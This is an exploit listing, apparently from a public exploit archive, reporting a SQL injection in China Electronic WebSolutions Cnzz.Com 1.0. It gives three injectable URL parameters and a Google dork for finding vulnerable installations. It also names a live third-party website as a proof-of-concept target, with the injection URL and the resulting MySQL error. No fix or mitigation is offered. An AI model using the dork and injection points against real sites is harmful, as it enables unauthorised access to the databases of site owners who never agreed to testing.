China Electronic WebSolutions Cnzz.Com version 1.0 suffers from a remote SQL injection vulnerability.
8fcdfd4adfdd5fd8ee832e4e220d458b#################################################################################################
# Exploit Title : China Electronic WebSolutions Cnzz.Com 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : Cnzz.Com
# Google Dork : inurl:''/productlist.php?cate=''
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Version Information : 1.0
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL
Command ('SQL Injection') ]
# Cyberizm.Org Exploit Reference Link :
cyberizm.org/cyberizm-china-electronic-websolutions-cnzz-sql-injection-vuln.html
#################################################################################################
+ China Electronic WebSolutions Cnzz.Com SQL Injection Vulnerability
#################################################################################################
SQL Injection Exploits =
/aboutus.php?id=[SQL Injection]
/productlist.php?cate=[SQL Injection]
/newsdetail.php?id=[SQL Injection]
#################################################################################################
# Example Site => xuhegd.com/aboutus.php?id=1%27 => [ Proof of Concept for
SQL Inj ] => archive.is/NRzdT
# SQL-DB Error => You have an error in your SQL syntax; check the manual
that corresponds to your
MySQL server version for the right syntax to use near ''1''' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################